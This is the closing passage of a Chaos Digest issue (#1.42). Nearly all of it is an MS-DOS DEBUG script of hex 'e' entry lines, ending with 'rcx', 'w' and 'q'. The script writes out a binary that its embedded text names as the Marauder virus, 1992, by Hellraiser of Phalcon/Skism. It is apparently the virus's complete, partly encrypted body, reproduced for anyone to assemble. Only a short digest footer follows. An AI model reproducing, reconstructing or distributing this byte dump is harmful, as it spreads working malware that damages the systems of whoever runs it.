570. e 0120  65 20 4D 61 72 61 75 64 65 72 20 76 69 72 75 73
571. e 0130  2E 20 31 39 39 32 2C 20 48 65 6C 6C 72 61 69 73
572. e 0140  65 72 20 50 68 61 6C 63 6F 6E 2F 53 6B 69 73 6D
573. e 0150  2E 0D 0A 24 20 20 20 20 20 20 20 B4 09 BA 03 01
574. e 0160  CD 21 CD 20 E8 00 00 5E 81 EE 0E 01 E8 05 00 E9
575. e 0170  85 00 3A 28 8B EE 81 C6 65 04 8B FE 50 53 51 52
576. e 0180  B9 8F 01 FD AD 33 86 19 01 AB E2 F8 5A 59 5B 58
577. e 0190  8B F5 C3 E8 DE FF CD 21 E8 D9 FF C3 7A 6B 7B 6A
578. e 01A0  91 B5 13 99 FC 93 D4 51 13 99 EC EE 99 E7 4A 49
579. e 01B0  4B 48 99 FC 93 D4 77 16 99 EC 42 41 43 40 AB 9D
580. e 01C0  13 EF 48 4B 49 4A 99 E7 DF 32 32 49 5F 73 60 73
581. e 01D0  67 76 77 60 4F 32 23 2B 2B 20 32 5A 77 7E 7E 60
582. e 01E0  73 7B 61 77 60 32 3F 32 42 7A 73 7E 71 7D 7C 3D
583. e 01F0  41 79 7B 61 7F 3C 1A 2E 82 0C 0F E5 1B A1 A6 76
584. e 0200  3E A4 BE 48 3E 2F 82 0C 1F A5 AE 4A 3E E5 1B 7E
585. e 0210  8E 6F 08 FA BB EE EC 2C F7 09 64 9C 23 E5 1B 2C
586. e 0220  7B A0 BE FB 3E 90 00 74 B3 AC EE 2C 6C 75 B7 9E
587. e 0230  75 2C B7 96 69 2C 83 2C 3A D4 C9 8C 6F 76 8E 32
588. e 0240  B7 BC 55 2C F7 09 8E 02 F7 09 BB D2 38 2A 4F 2B
589. e 0250  D3 96 3B 9C 74 A5 AE 10 3E 91 3D 28 F7 09 49 6C
590. e 0260  8E 32 B7 BC 22 2D F7 09 8E 13 B7 BC 78 2C F7 09
591. e 0270  48 2A D1 E2 BA 94 67 2C 3B 5C 23 98 3B A0 BE 75
592. e 0280  3E 9C 74 1B F3 99 29 A5 AE 16 3E E5 1B 5B 33 C1
593. e 0290  69 29 AA B8 8E 67 D1 DB 8E 13 B7 BC 0C 2D F7 09
594. e 02A0  48 DA D1 B2 B1 B4 BE 2C B3 B4 71 2C 82 29 79 1B
595. e 02B0  F3 A5 AE A5 3E E5 1B 5A 05 C0 A0 29 48 12 B3 AC
596. e 02C0  76 2C B1 B4 BD 2C B3 B4 7D 2C B1 B4 BF 2C B3 B4
597. e 02D0  73 2C A9 9C 05 91 3E 28 B7 BC 75 2C F7 09 BA 94
598. e 02E0  68 2C B2 5D 1F 90 3B 6B B1 A4 71 2C B7 BC B7 2C
599. e 02F0  08 C5 F7 09 8E 16 F7 09 07 2D 3A 5C 30 15 38 28
600. e 0300  4E 2D 8E 67 D3 7D C5 C1 E1 28 BB 94 75 2C 77 72
601. e 0310  4E FB D2 1F 3B 15 2A 28 48 E3 07 B7 C6 5B FC 05
602. e 0320  39 28 B2 8C 63 2C B2 AC 62 2C FC AC 60 2C B2 B8
603. e 0330  8E C1 B2 8C 6D 2C 08 E8 B2 AC 67 2C C5 AC 7F 2C
604. e 0340  B1 C6 D2 CF 3A 9C 16 E5 1B AB C0 28 4E DF B3 BC
605. e 0350  23 29 8B 20 E9 E2 B3 BC 61 2C BA D2 24 56 39 C3
606. e 0360  1A B8 B7 9E 79 29 B7 96 21 29 83 38 3A C0 82 28
607. e 0370  B7 9E 69 29 B7 96 09 29 83 2E 3A C0 90 28 D1 35
608. e 0380  AA A5 8C 71 3B A5 84 33 3B 91 2A 28 D2 B1 3A A5
609. e 0390  8C 41 3B A5 84 1B 3B 91 3C 28 D2 A3 3A C0 B6 28
610. e 03A0  B1 DD 8E 68 83 7F 39 AB FB 2D B7 BC 31 29 D2 CA
611. e 03B0  C7 5A 34 C0 B6 28 8E 68 83 2C 3A A5 AE 7F 3E E5
612. e 03C0  1B 90 3B 7F B1 A4 73 2C B1 BC 7D 2C B1 B4 76 2C
613. e 03D0  F7 09 8E 16 F7 09 82 29 79 A3 B6 63 3E A5 AE A5
614. e 03E0  3E 1A D7 E5 1B 9C 01 A5 AE FB 3E E5 1B 9C 20 92
615. e 03F0  BA 28 F7 09 6C 75 82 0C 1F A5 AE 76 3E E5 1B A5
616. e 0400  8C 7B 3E 97 3A 29 83 2C 3A D4 C9 8C 85 28 3B D7
617. e 0410  DD C0 22 28 8E 66 83 2F 3A A5 AE 16 3E E5 1B 5A
618. e 0420  F6 C0 06 28 8E 67 D1 DD C6 DB 9E EB B1 DD BB EE
619. e 0430  79 29 B1 D6 83 05 3A 85 09 AE 61 2C 91 CA C2 A3
620. e 0440  CF EB 82 28 78 1B F3 1B E8 E5 1B EB 82 2A 78 1B
621. e 0450  E8 1B F3 E5 1B EB 82 2A 07 A5 AE A5 3E E5 1B EB
622. e 0460  D2 DB C5 5A 11 A3 E2 7B D2 C9 C5 93 15 28 CD DB
623. e 0470  B1 E0 61 79 D2 E3 C5 71 6B 9C 7A 91 15 28 B7 BC
624. e 0480  55 29 F7 09 48 2E 63 61 D9 2A D1 C4 8E 16 F7 09
625. e 0490  F9 02 14 6B 75 65 3A 02 14 02 3A 06 14 28 3B 28
626. e 04A0  A2 3F 36 9E 1A 2D 3A 28 D1 71 AA 7C 33 E5 1A B8
627. e 04B0  D3 49 3A A0 12 12 3A 7E 3B 99 24 1A FA E7 B4 2E
628. rcx
629. 03C0
630. w
631. q
632.  
633. ------------------------------
634.  
635. End of Chaos Digest #1.42
636. ************************************
637.